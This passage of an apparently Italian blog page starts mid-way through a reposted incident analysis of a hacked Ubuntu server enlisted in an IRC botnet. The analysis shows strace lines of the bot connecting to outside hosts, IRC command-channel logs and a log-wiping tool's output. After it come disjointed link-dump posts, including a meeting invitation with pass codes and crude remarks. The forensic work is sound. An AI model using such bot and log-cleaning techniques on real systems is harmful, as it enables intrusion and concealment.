connect(4, {sa_family=AF_INET, sin_port=htons(6667), sin_addr=inet_addr("195.159.0.92")}, 16) = -1 EINPROGRESS (Operation now in progress)

So it tries to connect to IP-address 83.18.74.235 on port 9714 and 195.159.0.92 on port 6667 (this port is used for irc-servers):

root@server1:~# dig +short -x 83.18.74.235
manhattan.na.pl.
root@server1:~# dig +short -x 195.159.0.92
ircnet.irc.powertech.no.

Another polish host. The other IP-adress, "ircnet.irc.powertech.no" is a CNAME for "irc.powertech.no", a well known irc-server here in Norway.

Using the tcpdump, I identified one network-stream to irc-server irc.powertech.no. As these snippets show, they show the smbd connecting to "irc.powertech.no", and joining channel "#aik":

:irc.powertech.no 001 578PAB9NB :Welcome to the Internet Relay Network 578PAB9NB!~op@ti231210a080-3666.bb.online.no
:irc.powertech.no 002 578PAB9NB :Your host is irc.powertech.no, running version 2.11.1p1
:578PAB9NB!~op@ti231210a080-3666.bb.online.no JOIN :#aik
:irc.powertech.no 353 578PAB9NB @ #aik :578PAB9NB kknd raider brandyz jpi conf xerkoz IpaL vvo 
:irc.powertech.no 366 578PAB9NB #aik :End of NAMES list.
:irc.powertech.no 352 578PAB9NB #aik ~op ti231210a080-3666.bb.online.no irc.powertech.no 578PAB9NB G :0 op - GTW
:irc.powertech.no 352 578PAB9NB #aik ~kknd ti231210a080-3666.bb.online.no irc.hitos.no kknd H :2 kknd - GTW
:irc.powertech.no 352 578PAB9NB #aik ~raider mobitech-70.max-bc.spb.ru *.dotsrc.org raider G :4 raider - GTW
:irc.powertech.no 352 578PAB9NB #aik ~brandyz mobitech-70.max-bc.spb.ru *.dotsrc.org brandyz G :4 brandyz - GTW
:irc.powertech.no 352 578PAB9NB #aik ~jpi p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp jpi G :8 jpi - GTW
:irc.powertech.no 352 578PAB9NB #aik ~conf p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp conf G :7 conf - GTW
:irc.powertech.no 352 578PAB9NB #aik ~xerkoz p3124-ipad309sasajima.aichi.ocn.ne.jp *.jp xerkoz H :7 xerkoz - GTW
:irc.powertech.no 352 578PAB9NB #aik lm campus19.panorama.sth.ac.at *.at IpaL H :5 .LaPi.9@.IRCNet..
:irc.powertech.no 352 578PAB9NB #aik ~vvo ppp86-7.intelcom.sm *.tiscali.it vvo H :6 vvo - GTW
:irc.powertech.no 315 578PAB9NB #aik :End of WHO list.

This is just the raw network traffic of the irc-session joining channel #aik and listing all other members on that channel. I decided to join that channel myself (notice the nice underground nick: "viper42"). I was surprised not to be asked for any channel password. I guess our attacker made another bummer:

17:43 -!- viper42 [~viper42@trinity.gnist.org] has joined #aik
17:43 [Users #aik]
17:43 [ 578PAB9NL] [ conf] [ jpi ] [ raider ] [ vvo ] 
17:43 [ brandyz ] [ IpaL] [ kknd] [ viper42] [ xerkoz] 
17:43 -!- Irssi: #aik: Total of 10 nicks [0 ops, 0 halfops, 0 voices, 10 normal]
17:43 -!- Irssi: Join to #aik was synced in 1 secs

I found my friends server with the nick "578PAB9NB" and some other machines. These zombies are probably just waiting for the attacker to join the channel and give orders. Or perhaps the attacker already are lurking there. All have "* – GTW" at the end of their nick, except one:

17:45 [powertech] -!- IpaL [lm@campus19.panorama.sth.ac.at]
17:45 [powertech] -!- ircname : LaPi@IRCNet
17:45 [powertech] -!- channels : #relaks #ping @#seks #aik @#ogame.pl 
#pingwinaria #hattrick #trade #admin @#!sh 
17:45 [powertech] -!- server : *.at [o o/ /o/]

This is the only nick that also have joined more than one channels. Guess I’ve found my attacker, unless this is a decoy. (Again: The attacker can’t be this stupid?!?) I guess I’ll just hang around for a few days just to see if anything interesting comes up. The hostname resolves to:

$ dig +short campus19.panorama.sth.ac.at
193.170.51.84

And according to RIPE this IP-address belongs to Vienna University Computer Center. I asked them ( cert at aco net ) to take a closer look at the hostname in question and got an answer just hours later:

From: Alexander Talos via RT
To: larstra@ifi.uio.no
Subject: Cracker at campus19.panorama.sth.ac.at (193.170.51.84) [ACOnet CERT #38603]
Date: Fri, 18 May 2007 18:22:43 +0200 (CEST)
Reply-To: cert@aco.net
-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA1
Hej!
On Fri May 18 14:45:03 2007, larstra@ifi.uio.no wrote:
> I have been tracking down cracker which connected from
> campus19.panorama.sth.ac.at (193.170.51.84). The user, which
Ouch. panorama.sth.ac.at is a dormitory with about 4k rooms all
behind a NAT gateway - it will be very hard to get hold of the
miscreant.
This incident will, in the long run, definitely help me getting
rid of the NAT boxes in setups like that, but right now, we will 
have to make do with what we have.
> Please investigate the host in question. Perhaps is this a
> compromised host on your network acting as a jumpstation for
Sure, and even in a NATed environment, this is still possible.
Btw, you did a great job in analysing the compromised machine!
I'll let you know when I have either further questions or any
interesting results.
Cheers,
Alexander Talos
- --
IT-Security, Universitaet Wien, ACOnet CERT
<URL:http://www.univie.ac.at/ZID/security/>
T: +43-1-4277-14351 M: +43-664-60277-14351

No luck there I’m afraid..

Oh, – and I tried to log in using ssh (on port 54098) on all zombies listed here, but no ports where open. The other zombies are probably using other ports for the ssh backdoor.

The other identified network stream, destined to "83.18.74.235" was garbled, so it’s time to fire up up strace again:

root@server1:/var/.x/psotnic# strace -f ./smbd conf1 &> /root/dump.strace

As expected, this creates a lot of output. Among other things, it tries to start the irc-client BitchX:

[pid 7537] execve("/bin/sh", ["sh", "-c", "BitchX -v 2> /dev/null"]

Which fails, since BitchX is not installed:

[pid 7537] write(2, "sh: ", 4) = 4
[pid 7537] write(2, "BitchX: not found", 17) = 17
[pid 7537] write(2, "n", 1) = 1
[pid 7537] close(2) = 0

You can see some of the traffic from tcpdump in the picture below:

This was just for one of the two smbd-processes. The other connected to the same polish site, and instead of "irc.powertech.no", it connected to "irc.hitos.no", an IRC-server located in Tromsø. The same zombies are at that channel as well – guess I’ll stick around there for a few days as well.

Also, what the cracker did, was to run a program called "hide" to clean entries from various log-files:

root@server1:/usr/lib/libsh# ./hide +
Linux Hider v2.0 by mave
enhanced by me!
[+] [Shkupi Logcleaner] Removing + from the logs........ .
[+] /var/log/messages ... [done]
[+] /var/run/utmp ... [done]
[+] /var/log/lastlog ... [done]
[+] /var/log/wtmp ... [done]
* m i s s i o n a c c o m p l i s h e d *
p.h.e.e.r S.H.c.r.e.w
server1:/usr/lib/libsh#

So why did the attacker then wipe out "/var/log/*"? Did he not trust this tool? Did he panicked?

So the box has been compromised, backdoor installed and it’s been converted to a zombie. The attacker made several mistakes allowing him to be detected:

Forgot to wipe out root’s .bash_history.
Wiped out everything under "/var/log/*", including directories which several programs relied on and thereby refusing to start. Now, why did he do that? This certainly was stupid.
Changed the root-password. Another bummer. Never ever change the root-password. This surely will catch the attention of a sysadmin.
Did not password-protect the IRC-channel where all his zombies resides. Not that it doesn’t matter much for us, since we would have sniffed that up as soon as the zombie tried to join the channel.
Do the attacker still hang around the same channel as all his zombies does (the LaPi-guy)? If so he’s just begging to be exposed.

Severeal questions remains:

Why was the command "ssh ftp@62.101.251.166" entered? Did the attacker made a mistake in typing this command or did it serve some other purpose? The IP addres resolves to:
```
			$ dig +short -x 62.101.251.166
	cA6FB653E.dhcp.bluecom.no.
	
```
What kind of traffic goes to 83.18.74.235 (manhattan.na.pl) ?
And the most important question is, how did he get access in the first time? The server was running Ubuntu 6.06 LTS (i386) and was fairly updated. The compromised could be caused by:
- An exploit unknown to the public.
- A user accessing this server from an already compromised host. The attacker could then sniff the the password.

What’s Related

Story Options

Trackback

Trackback URL for this entry: http://blog.gnist.org/trackback.php?id=HollidayCracking

Here’s what others have to say about ‘Holiday cracking’:

*****************************************************************************************

analisi di un attacco condotto male
http://blog.gnist.org/article.php?story=HollidayCracking
link da zone allarm di roma
http://forums.zonealarm.org/zonelabs/board/message?board.id=security&message.id=2055
http://www.trojanscan.com/ a free online trojan scanner
http://www.iana.org/ a good source for technical papers and port references
http://www.arin.net/whois/ ARIN’s whois lookup, can lookup by IP or Domain
http://www.geektools.com/whois.php Geektools whois, by IP only
http://www.robertgraham.com/pubs/ good general information about Firewalls
http://www.dshield.org/ A agency that you can suybmot your logs to, and they will use yours with others to try and clean up some of the bad signals flying around.
http://www.mynetwatchman.com/ Another reporting agency
http://www.accs-net.com/hosts/ Hosts file information
http://accs-net.com/hostess/ Hosts file manager
http://www.memtest86.com/ Geeky memory tester
http://www.safer-networking.org/ Spybot S&D Malware scanner
http://lavasoft.element5.com/ AdAware malware scanner
http://www.webroot.com/ Spy Sweeper, another malware scanner
http://www.winpatrol.com/ WinPatrol
http://www.wilders.org/index.htm Comprehensive Security site

Posted in Generale | Comments Off

reverse engineering live linux lay

Posted on September 13, 2008 by alitaliaxyz

http://www.google.it/search?hl=it&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=reverse+engineering+di+schemi+di+protezione+dalla+copia&spell=1
art hacking
http://digilander.libero.it/unno2/dvd.htm
http://it.wikipedia.org/wiki/Digital_rights_management
Norvegia: illegale il DRM di Apple
http://punto-informatico.it/1863637/PI/News/norvegia-illegale-drm-apple.aspx
http://www.google.it/search?hl=it&q=cracker+reverse+engineering+di+schemi+di+protezione+dalla+copia&btnG=Cerca&meta=
http://www.quequero.org/Glossary
http://www.hardwaremax.it/news/sistemi-operativi/271-qvista-crackq-server-kms-illegale.html
ma un "cracker". Inutile dire che anche questa definizione ha scontentato parecchi,
primi fra tutti coloro che nella scena dell’underground digitale si definiscono, appunto,
cracker. Viene definito tale, un esperto di "reverse engineering",
l’arte di "smontare" un programma e sproteggerlo per capirne il funzionamento ed
eliminarne le chiavi di protezione, i numeri seriali e, perché no, anche qualche bug
http://www.gregorys.it/informat/hacker/hacker.htm
codice di algoritmo di prodezione in C++
http://forum.html.it/forum/printthread.php?threadid=1262177&perpage=500
http://www.ippari.unict.it/wikippari/wiki/Hacker_e_Cracker
Cfr. « Pekka Himanen presenta L’etica hacker»
http://www.feltrinelli.it/SchedaTesti?id_testo=43&id_int=53
http://it.wikipedia.org/wiki/Categoria:Sicurezza_informatica
http://it.wikipedia.org/wiki/Categoria:Cracking
http://it.wikipedia.org/wiki/Categoria:Hacking
http://www4.autistici.org/ironbishop/glider/hacker_emblem.html
reversiamo per migliorare la nostra conoscenza di linguaggio assembly
http://209.85.135.104/search?q=cache:fGwMZUjwW0gJ:https://quequero.org/uic/tut1_up.html+cracker+reverse+engineering+di+schemi+di+protezione+dalla+copia&hl=it&ct=clnk&cd=11&gl=it
Codifica
Processo di cifratura delle informazioni trasmesse. La codifica consente
una facile protezione dei dati dalla lettura da parte di utenti indesiderati ed
è disponibile in due forme: la codifica software, molto diffusa e semplice
da installare e la codifica hardware, più difficile da installare ma più veloce e più complessa da decifrare.
http://www.delbiaggio.ch/glossario.php?l=C
live cd per avvocati
http://www.iteam5.net/blog/2004_11_01_iteam5_archive.asp
http://www.e-fense.com/helix/
http://www.e-fense.com/helix/downloads.php
università di camerino
http://www.unicam.it/matinf/
http://www.unicam.it/matinf/Dispense/maggiulli/Dispense/Politiche%20delle%20reti%20e%20sicurezza%202004-terza%20parte.pdf
anagrammi e regular expression
^(?=.*a)(?=.*b)(?=.*c)(?=.*d)[abcd]{4}$
http://www.dotnet2themax.it/blog/CategoryView,category,.NET%20Framework.aspx
#
# [PDF]
CRYPTO-GRAM 15 agosto 2002 Scritta da Bruce Schneier Fondatore e …
Formato file: PDF/Adobe Acrobat – Versione HTML
accecato (probabilmente un riferimento al movimento open source e alle cause di reverse engineering). Avrebbe dovuto. proteggere Troia, ma non protegge …
www.communicationvalley.it/FilesProc/CryptoFileContent.php?id=57
dall associazione italiana sulla sicurezza informatica
http://www.clusit.it/download/Q04_web.pdf
del 2007 tutela del software legge
http://www.xelon.it/documenti/2007/LorenzoBaloci-TutelaSoftware.pdf

http://www4.autistici.org/ironbishop/glider/hacker_emblem_faq.html
…………………………………………………………………………………………………………………………………………………………………………………………………………
da
http://arte.noblogs.org/post/2008/09/12/veoh-e-linux-si-pu-ancora
http://marcocalatozzo.wordpress.com/2008/07/30/veoh-tv-anche-su-linux/
http://salutidamarte.blogspot.com/2008/08/risolto-il-problema-con-veohproxy-veoh.html
vediamo come procedere per utilizzare di nuovo Veoh, io l’ho provato su Xubuntu dove già è installato python…le righe di questo colore sono quelle da digitare nel terminale

aprire un terminale e digitare

wget http://veohproxy.googlecode.com/files/VeohProxy-1.4.zip

per scaricare il software, poi szippiamo

unzip VeohProxy-1.4.zip

entriamo nella cartella

cd VeohProxy-1.4

avviamo il programma

python VeohProxy.py

vi comparirà la data e l’ora tipo così:

Fri Sep 12 17:17:53 2008 VeohProxy Starts – 127.0.0.1:64653

apposto, funziona tutto…adesso andate a cercare il vostro film e copiate l’indirizzo così:

funzionava tutto. andiamo nella nostra home, entriamo nella cartella VeohProxy-1.4 ed apriamo con un editor di testo (tasto destro del mouse, apri con editor di testo) il file VeohProxy.py e cambiamo la riga che dice:

url = ‘http://www.veoh.com/service/getMediaInfo.xml’

con questa

url = ‘http://www.veoh.com/service/getMediaInfo.xml clientGUID=""&version="3.0.0"’

salvate e chiudete.

adesso ci siamo!

cerchiamo il nostro film, ad esempio ho scelto il documentario di Pasolini ‘Comizi d’amore’

nel browser apparirà questo link:

http://www.veoh.com/videos/v63409415eZTX7Fc

noi copieremo il codice, quello che inizia con la ‘v’ e lo inseriremo in vlc o totem con il Veohproxy aperto per vederlo in streaming. altrimenti per scaricarlo, apriremo una pagina del browser e scriveremo:

http://127.0.0.1:64653/v63409415eZTX7Fc

la parte http://127.0.0.1:64653/ sarà sempre uguale, cambierà solamente il codice del film che ci interessa…ad esempio: nel

riassunto:

………………………………………………………………………………………………………………………………………………….

# # [PDF] CRYPTO-GRAM 15 agosto 2002 Scritta da Bruce Schneier Fondatore e … Formato file: PDF/Adobe Acrobat – Versione HTML accecato (probabilmente un riferimento al movimento open source e alle cause di reverse engineering). Avrebbe dovuto. proteggere Troia, ma non protegge … www.communicationvalley.it/FilesProc/CryptoFileContent.php?id=57 dall associazione italiana sulla sicurezza informatica http://www.clusit.it/download/Q04_web.pdf del 2007 tutela del software legge http://www.xelon.it/documenti/2007/LorenzoBaloci-TutelaSoftware.pdf http://www4.autistici.org/ironbishop/glider/hacker_emblem_faq.html …………………………………………………………………………………………………………………………………………………………………………………………………………

Posted in Generale | Comments Off

frugalware h hacking i cracker

Posted on September 12, 2008 by alitaliaxyz

ossblog

–>

Rilasciata Frugalware 0.9

pubblicato: giovedì 11 settembre 2008 da Andrea de Palo in: OS GNU/*/Linux

Header Frugalware Linux

Tra le distribuzioni “minori” Frugalware è sicuramente una di quelle

con il maggior numero di utenti: ispirata alla pulizia di Slackware e

dotata di un package manager derivato da queta e arch linux

……………………………………………………………………………

il dizionario
http://www.geocities.com/Athens/Styx/8877/mj/mj.html
http://www.lastknight.com/2006/09/04/hackit_2006-e-ora-di-un-hacking-moderato/
http://www.lastknight.com/2007/06/01/intervista-a-raoul-chiesa-e-citazione/
video intervista a raoul chiesa
http://www.lastknight.com/2007/06/01/intervista-a-raoul-chiesa-e-citazione/
http://www.wikiartpedia.org/index.php?title=Hacker
http://nmap.org/index.html
steven raymond
http://www.dvara.net/HK/diventarehacker.asp

Onanismo tecnologico: crea, ricerca e consuma i tuoi contenuti

È impossibile seguire le rapidissime evoluzioni e innovazioni “made in Google”:
i rilasci di nuovi servizi si susseguono in maniera quasi convulsa, e diventa molto
difficile capire quali siano realmente destinati ad avere un impatto nelle nostre vite
e quali invece saranno dimenticati nel giro di qualche mese o settimana. Del resto,
è anche poco interessante e utile perdersi in elaborazioni complicate,
in tassonomie esaustive che inevitabilmente tralasciano eccezioni significative,
se consideriamo l’elevata depauperabilità delle informazioni e delle innovazioni su Internet.
La natura fluida e dinamica della rete scoraggia, se mai qualcuno ne
sentisse ancora il bisogno, qualsiasi approccio totalizzante e onnicomprensivo,
che si rivela velleitario nel momento stesso della sua farraginosa esposizione.
ma nonstante tutto noi tutti abbiamo un nokia io ad esempio:
http://www.nokia.it/link?cid=PLAIN_TEXT_418353

e il testo finisce ancora una volta su scribd

vi ricordata il post su serp google e poi

quelo successivo sulle telecamere in yahoo?

mi fa sorgere un sospetto le case pornografiche studiano

le accuse di onanismo per mettere in crisi l unico socialismo

esistente in eeuropa il surrealismo francese… chiuso anche lo sterp…

driver xp vista
http://www.nokia.it/A4759145

matlab

http://guide.dada.net/matlab/interventi/2004/08/173417.shtml

Posted in Generale | Comments Off

crittografia e mail h. hacking video anonimi

Posted on September 11, 2008 by alitaliaxyz

http://enigmail.mozdev.org/download/index.php

http://enigmail.mozdev.org/documentation/quickstart.php

http://enigmail.mozdev.org/home/index.php

mailing list

http://www.mozdev.org/mailman/listinfo/enigmail/

cliccalndo sulla scritta
blue GnuPG

e poi Thunderbird 2.0

http://www.mozilla-europe.org/en/products/thunderbird/

…………………………………………………………………………………….

peter deutsch

http://en.wikipedia.org/wiki/L._Peter_Deutsch

i primi

http://it.wikipedia.org/wiki/Ada_Lovelace

http://www.sdsc.edu/ScienceWomen/lovelace.html

http://www.windoweb.it/edpstory_new/ep_babbage.htm

pitagorici ada lovelace
alan turing

http://www.turing.org.uk/turing/

richard stallman

http://it.wikipedia.org/wiki/Richard_Stallman

http://www.stallman.org/

canzone

http://www.stallman.org/guantanamero.ogg

steve wozniak

attacco synflood e
firewell

http://www.fsf.org/resources/formats/playogg

cpdump

http://www.tcpdump.org/

ip tabella flusha

http://www.hwupgrade.it/forum/archive/index.php/t-944062.html

synflood syncockie

yep si

webfarm ladri syn_wait vi
sibili durante la connessione e sifacevano

pagare schede di rete
suplemtare e switch per collegare piu server

canzone

http://it.wikipedia.org/wiki/You_Can_Leave_Your_Hat_On

bionde

http://it.youtube.com/watch?v=JfMT6zfpHwU

musica walt disney

http://it.youtube.com/watch?v=YDlmZ-i5sRw&feature=related

9 settimane e mezza

http://it.youtube.com/watch?v=aHOPI3V8S6U

e.t. telefono e casa

http://it.youtube.com/watch?v=pARdd_Cfq1k

http://it.youtube.com/user/debbilina

http://it.youtube.com/watch?v=KcaCqvlBC30&feature=related

http://it.youtube.com/watch?feature=related&v=GpldMKQ2TXs

http://it.youtube.com/watch?v=vOGPyQAamek&feature=related

bab sitter

http://it.youtube.com/watch?v=jt-uRTBprK8&feature=related

video anonimi

quindi,
se tra i filmatari qualcuno si inizia a documentare su come far
venire i pixel sulle facce, si esercita a mettere sottotitoli e fare
video editing, fa un favore a tutti i filmatati e a se stesso.

1)
Anonimato nei video e’ due anni che m’impegno a studiare gli
strumenti per fare quello che dici in questa mail, percui posso
fornire un paio di link al riguardo….

https://ch.indymedia.org/frmix/2008/02/57276.shtml

j si tratta di un plugin per
frei0r [1], che non ho testato ma il codice e’ promettente (usa
OpenCV [3],

la libreria di computer vision della Intel),

quindi
dovrebbe essere all’ altezza delle tue aspettative.

leggendo la
documentazione al riguardo, sembra che frei0r

ti permetterebbe di
usare quel plugin su diversi sw video,

tra cui anche cinelerra e
freej :

[1] http://piksel.org/frei0r

[2]
http://propirate.net/repos/frei0r-autoconf/src/filter/facedetect/facedetect.c

[3] http://opencvlibrary.sourceforge.net/

1) Anonimato nei
video

e’ due anni che
m’impegno a studiare gli strumenti

per fare quello che dici in questa
mail,

un paio di link al riguardo….

notare la recente
presentazione di un "face swapping"

piuttosto avanzato al
SIGGRAPH quest’anno:

http://www1.cs.columbia.edu/CAVE/projects/face_replace/

ficata

[snip]

ovviamente tutto
questo in teoria, se qualcuno si mette a codare cose del genere lo
dica che magari si fa assieme.

in realtà c’è
già roba codata, tipo a ‘sta pagina
http://opencvlibrary.sourceforge.net/FaceDetection l’ho appena
provato con la webcam e funge abbastanza bene… poi gli
esperti/interessati sceglieranno…

_____________________________________________

TABULA
RASA – special project http://www.manifesta7.it:80/?language=0

Roaming Martedì, 30 settembre

www.roaming-art.it
e`un progetto di Ermanno Cristini,

a cura di Alessandro Castiglioni,
Emanuele Becheri e Vincenzo Cabiati. Parteciperanno Armin Linke,
Ermanno Cristini, Microcollection. ROAMING e’ una serie di mostre
che durano solo il tempo dell’inaugurazione: dei flash che
sopravvivono nella camera dei fotografi e poi galleggiano nella
dimensione indistinta del web. Questa edizione sara´fotografata
da Casaluce/Geiger – synusi@

Posted in Generale | Comments Off

webcam webcasting e altro

Posted on September 10, 2008 by alitaliaxyz

http://www.youtube.com/watch?v=6w6uK-FLzV8

capita spesso che quando sono in pvt con alessia o l hostess e

magari parlo per fare una cosa chiamo da una pizzeria o bar ..

"come hai detto?"

no … non so stato io

http://it.openoffice.org/download/2.3.0/download230.html

http://sourceforge.net/project/showfiles.php?group_id=176809

smtp.atlarge.net

invitation.communiva

invitaions@dimdim.com

password

**********

http://www.dimdim.com/support/dimdim_help.html

sono qui e funziona

http://webmeeting.dimdim.com/dimdim/html/layout/GetFullConsole.action?confKey=avellino&cflag=null&uri=951bb3b6-d1c3-4017-b891-217e462fc3d0&pubAvailable=false

Welcome to your Dimdim Web Meeting.
me: ciao
avellino has joined the meeting.
avellino: ciao
avellino has left the meeting
ecco un esempio di invito che effettuate dalla vostra lavagnetta:
Dimdim Web Meeting Invitation Hello! Your friend, avellino,

has invited you to a Dimdim Web Meeting that started right now!

To join the web meeting, simply click here.

[1]* You can also join the meeting by entering this

meeting ID avellino at Dimdim.com

[2] DETAILS ABOUT THE MEETING : MEETING NAME: avellino MEETING ROOM ID: avellino YOUR ROLE: Attendee INTERNATIONAL DIAL IN: 712-432-6139 MODERATOR PASS CODE: 283554 ATTENDEE PASS CODE: 283554 MEETING KEY: invitation.communiva HINT: You don’t need to be a member of Dimdim to attend this meeting but if you join you can host your own meetings for free. Click here

[3] to join. This Dimdim Web Meeting invitation is a personal invitation, please do not forward it. Sincerely, Your Dimdim Team *If the link above is broken (as can happen with some email systems) simply copy and paste the following URL into your browser address bar: http://webmeeting.dimdim.com:80/portal/JoinForm.action?confKey=avellino&attendeePwd=invitation.communiva&email=avellino@autistici.org&displayName=avellino&asPresenter=false Copyright (c) 2008 Dimdim. Meet freely. All Rights Reserved

[4] / Privacy Policy

[5] Links: ——

[1]

http://webmeeting.dimdim.com:80/portal/JoinForm.action?confKey=avellino&attendeePwd=invitation.communiva&email=avellino@autistici.org&displayName=avellino&asPresenter=false

[2]

http://www.dimdim.com

[3]

http://www.dimdim.com/registration/Dimdim_Signup.html

[4]

http://www.dimdim.com/tm [5] http://www.dimdim.com/ppolicy

articolo di fisica e startreck molto interessante tenendo conto che hanno previsto la fine del mondo nel 2012 ha ha:

Il giorno del bosone-Diario di una giornata in redazione 10 settembre 2008

appello della madre di renato

http://veritaperrenato.noblogs.org/

poto gps photo tagger gps e tv con linux

dove si terrà l hackmeeting
http://www.ask191.org/
dove ne parleremo insiem all evento successivo di venezia
http://ondarossa.info la mattina del 27 ore 11.00 circa
http://clic.noblogs.org/gallery/4364/guidaalt2008_web.pdf
photo tagger
http://shop.psiloc.com/en/Download,262282/Psiloc_PhotoTagger_S603rd.sisx
satellite sul pc va con silverlight il flash sperimentale di microsooft
http://www.ikaro.net/articoli/cnt/canali_satellitari_online-00674.html
anche con linux
http://www.livestation.com/account/register_thanks

jaromil
notare la recente presentazione di un "face swapping" piuttosto avanzato al SIGGRAPH quest’anno:
http://www1.cs.columbia.edu/CAVE/projects/face_replace/ che non si limita
semplicemente a mascherare, ma a cambiare l’espressione delle facce
rendendole poco riconoscibili (e biometricamente impossibili da classificare)
teoricamente non serve neanche andare cosi’ lontano per fare un software di mascheramento
facciale automatico che metta semplicemente un alone dove serve: basterebbe
usare OpenCV una libreria di manipolazione video
che contiene anche un algoritmo di riconoscimento facciale.
l’algoritmo da le coordinate e di seguito sarebbe possibile coprirle
con la maschera… sia usando direttamente openCV
o anche avvantaggiandosi con un framework come quello di FreeJ
(che ha gia’ il player/recorder video ed e’ configurabile in javascript)
sarebbe possibile filtrare video in automatico. ovviamente tutto questo in teoria,
se qualcuno si mette a codare cose del genere lo dica che magari si fa assieme. ciao – —

http://metropoliscafe.noblogs.org/post/2008/09/10/sabato-13-settembre-tutti-a-vicenza
dimessosi dopo blitz abtganarchici

Sabato 13 settembre: tutti a Vicenza

dove si terrà l hackmeetinghttp://www.ask191.org/

dove ne parleremo insiem all evento successivo di venezia

http://ondarossa.info la mattina del 27 ore 11.00 circa

http://clic.noblogs.org/gallery/4364/guidaalt2008_web.pdfphoto tagger

http://shop.psiloc.com/en/Download,262282/Psiloc_PhotoTagger_S603rd.sisx

satellite sul pc va con silverlight il flash sperimentale di microsooft

http://www.ikaro.net/articoli/cnt/canali_satellitari_online-00674.htmlanche con linux

http://www.livestation.com/account/register_thanks

jaromilnotare la recente presentazione di un "face swapping" piuttosto avanzato al SIGGRAPH quest’anno:

http://www1.cs.columbia.edu/CAVE/projects/face_replace/

che non si limitasemplicemente a mascherare, ma a cambiare

l’espressione delle faccerendendole poco riconoscibili

(e biometricamente impossibili da classificare)

teoricamente non serve neanche andare cosi’ lontano per fare un software di mascheramentofacciale automatico che metta semplicemente un alone dove serve: basterebbeusare OpenCV

una libreria di manipolazione videoche contiene anche un algoritmo di riconoscimento

facciale.l’algoritmo da le coordinate e di seguito sarebbe possibile coprirlecon la maschera…

sia usando direttamente

openCVo anche avvantaggiandosi con un framework come quello di

FreeJ(che ha gia’ il player/recorder video ed e’ configurabile in javascript)

sarebbe possibile filtrare video in automatico. ovviamente

tutto questo in teoria,se qualcuno si mette a codare cose del genere lo dica che magari si fa assieme. ciao – —

dimessosi capo digos pinto dopo blitz anarchici

Sabato 13 settembre: tutti a Vicenza

Posted in Generale | Comments Off

hello world in base all età e al lav. art hacking

Posted on September 10, 2008 by alitaliaxyz

hello world in base all età e al lavoro
http://blog.xsquid.net/2008/07/03/hello-world-in-base-all-eta-e-lavoro/#more-21

% gencat -H msgnrs.h -o hello.cat hello.msg
% cat msgnrs.h
#define MainSet 0x1     /* hello.msg:4 */
#define MainHello 0x1   /* hello.msg:5 */
% gcc -o hello hello.c -I.
% cp hello.cat /usr/share/locale/de/LC_MESSAGES
% echo $LC_ALL
de
% ./hello
Hallo, Welt!
%

 http://www.gnu.org/software/libc/manual/html_node/Common-Usage.html

il primo esercizio che rifaremo insieme

non un solo giorno non una sola ora unicamente pregammo il cielo

facemmo resistenza informatica tu con l alitalia e il laptop nell airbag

e io addormentandomi su di te

ero solo a guardarti sole sole la tua figa ...biondina

http://www.noemalab.org/sections/specials/tetcm/2003-04/hacker_art/art_on_the_net.html
http://www.exibart.it/
http://www.hackerart.org/
http://www.dvara.net/HK/artevisuale.asp
Sitografia
http://www.spc.org/
http://www.rhizome.org/
http://www.giulyars.net/
http://www.passiopea.net/
http://www.0100101110101101.org/
http://www.d-i-n-a.net/metagallery/vuk.html
www.artintotheweb.com/netartstories.htm
http://www.elpais.es/especiales/2002/arte/histo.htm

Importanti risorse per la stesura di questo elaborato sono state le indicazioni e gli articoli di Valentina Tanni che si possono trovare su http://www.exibart.com/ e di Paolo Giuliani sul sito http://www.giulyars.net.
http://www.neural.it/art_it/hacking/
http://www.neural.it/art_it/2006/04/monolith_copyright_hacking_1.phtml
tool per produrre mono file
http://monolith.sourceforge.net/
http://hcsoftware.sourceforge.net/jason-rohrer/Monolith_7D4.html
http://www.struttura.li.it/scheda-culatti.html
http://www.digicult.it/2008/HackerSpaceFest.asp
irc://irc.freenode.net/frlab
http://www.securityblog.it/category/eventi/
http://www.dvara.net/HK/netart.asp
Le opere.net rispondono al celebre appello di M. Duchamp per un’arte non retinica e non sono, anzi, non vogliono essere oggetti estetici, bensì operazioni culturali (vedi ad esempio, le operazioni di 01.org [www.0100101110101101.org], di Jodi [www.jodi.org], di Etoy [www.etoy.com]); lo specifico di questi lavori è quindi un contenuto concettuale con motivazioni etiche portanti
cia e artisti schedati
http://www.wikiartpedia.org/index.php?title=How_we_made_our_own_%27Carnivore%27
Il prospetto del software originale dell’FBI ricavato con il riverse_engineering non era
interessante per RSG. Storpiato da limitazioni legali ed etiche, il software dell’FBI
ha avuto bisogno di miglioramenti, non di emulazione. Così CarnivorePE è caratterizzato da una
nuova funzionalità emozionante, compresi la diagnosi dei clienti resi artisti, l’accesso
remoto, l’obiettivo tematico pieno, l’obiettivo dei dati completi, il buffering del volume, il protocollo
programmi per hack room
http://battleinfinity.forumcommunity.net/?t=12001844
http://www.hrf.altervista.org/hacktools.html
business open source
http://www.puntocontatto.it/Os_bus_model.php
e dopo molti link …
http://isole.ecn.org/hackit08/?page=seminari
http://pallotron.freaknet.org/curriculum-html.php
MuSE: Multiple Streaming Engine (http://muse.dyne.org): ho scritto il decoder channel per i file wav (C++ in ambiente UNIX);
stacktrace peridodico di resistenza informatica
http://stacktrace.it/2008/01/le-caratteristiche-del-buon-programmatore/
newsletter olografica
ftp://ftp.scoutnet.org/upload/incoming/newslettern11a2.txt
strano la lingua
http://strano.net/chaos/lingua.txt
corso di net art
http://www.domenicoquaranta.net/dispense/Brera07_net_art.pdf

di trasporto e la licenza per il software “open source‿. Il riverse_engineering non è

Posted in Generale | Comments Off

sens

IDS intrusion detection system programmazione stasera

inst arch linux l amore non corrisposto

hacking porco masterizzare dvd watermark

60 Watt solar panel built from cells

script k hackerantani amalfi scarlet johanson

Etimologia delle passioni

News sul tuo sito

esempio art hacking frugalware live scarlett johansson

scarlett johansson hot blonde sexy baby figa da paura

Holiday cracking

What’s Related

Story Options

Trackback

reverse engineering live linux lay

frugalware h hacking i cracker

ossblog

Rilasciata Frugalware 0.9

crittografia e mail h. hacking video anonimi

webcam webcasting e altro

hello world in base all età e al lav. art hacking

Recent Posts

Recent Comments

Archives

Categories

Meta